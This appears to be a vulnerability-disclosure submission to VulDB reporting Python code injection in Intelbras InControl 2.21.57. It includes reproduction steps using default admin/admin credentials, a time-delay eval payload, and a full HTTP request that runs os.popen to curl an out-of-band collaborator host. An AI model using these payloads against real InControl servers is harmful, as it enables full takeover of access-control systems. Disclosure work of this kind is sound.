| Title | Intelbras InControl 2.21.57 (last version) Command Injection |
|---|
| Description | Hello, I found a python code injection vulnerability in the latest version of the InControl Product, the vulnerability occurs through an api call for report export, through the vulnerability it is possible to take full control of the server.On fofa.info, there are over 2500 vulnerable hosts with many of them having the default admin/admin credential.
PoC:
Language Software: PT-BR
1 - After downloading the application and uploading it locally, log in with admin/admin and access the "Reports" or "Relatórios" section and "Relatório de Operadores".
2 - Check a box and click "Export report" and select "PDF".
3 - In burp, you can see that there is an api call like this:
(Investigating further I discovered that there are two paths /v1/operador/... and /v1/evento_operador/...)
GET /v1/evento_operador/relatorio?page=1&limit=10000&fields=%5B%22operador%22,%22acao%22,%22data_evento%22,%22objeto_afetado%22,%22tipo_objeto%22%5D
or
GET /v1/operador/relatorio?page=1&limit=10000&fields=%5B%22operador%22,%22acao%22,%22data_evento%22,%22objeto_afetado%22,%22tipo_objeto%22%5D
4 - Python code injection occurs in the "fields=" parameter.
5 - Take the request to the repeater and insert the following payload containing python code:
/v1/evento_operador/relatorio?page=1&limit=10000&fields=eval(compile('for%20x%20in%20range(1)%3a%5cn%20import%20time%5cn%20time.sleep(20)'%2c'a'%2c'single'))
6 - Note that the response took 20 seconds to come.
7 - Through this, we can execute commands. Watch the video below for better understanding (Please do not share the video!)
https://youtu.be/UdZVktPUy8A
Requests (EXECUTE CURL TO COLLABORATOR):
GET /v1/operador/relatorio?page=1&limit=10000&fields=eval%28compile%28%22%22%22for%20x%20in%20range%281%29%3A%5Cn%20import%20os%5Cn%20os.popen%28r%27curl%20http://0tucwq2m62h4pzo0gs2iif1lico3cw0l.oastify.com%27%29.read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29 HTTP/1.1
Host: localhost:4441
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json, text/plain, */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Authorization: JWT eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.
Origin: https://localhost:4445
Referer: https://localhost:4445/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
Connection: keep-alive
Payloads:
Time Delay: eval(compile('for%20x%20in%20range(1)%3a%5cn%20import%20time%5cn%20time.sleep(20)'%2c'a'%2c'single'))
Curl: eval%28compile%28%22%22%22for%20x%20in%20range%281%29%3A%5Cn%20import%20os%5Cn%20os.popen%28r%27curl%20http://0tucwq2m62h4pzo0gs2iif1lico3cw0l.oastify.com%27%29.read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29 |
|---|
| Source | ⚠️ https://www.intelbras.com/pt-br/software-de-gerenciamento-de-controle-de-acesso-incontrol-web |
|---|
| User | Stux (UID 40142) |
|---|
| Submission | 07/16/2024 15:55 (2 years ago) |
|---|
| Moderation | 09/28/2024 15:31 (2 months later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 278828 [Intelbras InControl up to 2.21.57 Relatório de Operadores Page /v1/operador/ fields code injection] |
|---|
| Points | 20 |
|---|